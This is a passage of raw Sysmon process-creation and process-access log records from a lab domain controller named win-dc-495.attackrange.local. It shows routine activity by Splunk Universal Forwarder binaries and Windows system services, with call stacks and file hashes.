Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.897{59A5CD1D-9275-6005-BA04-00000000A301}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:19.489{59A5CD1D-8E46-6005-0D00-00000000A301}6284796C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92AC-6005-BB04-00000000A301}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92AC-6005-BB04-00000000A301}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92AC-6005-BB04-00000000A301}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.614{59A5CD1D-92AC-6005-BB04-00000000A301}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.801{59A5CD1D-92AD-6005-BC04-00000000A301}49042912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.660{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92AD-6005-BC04-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 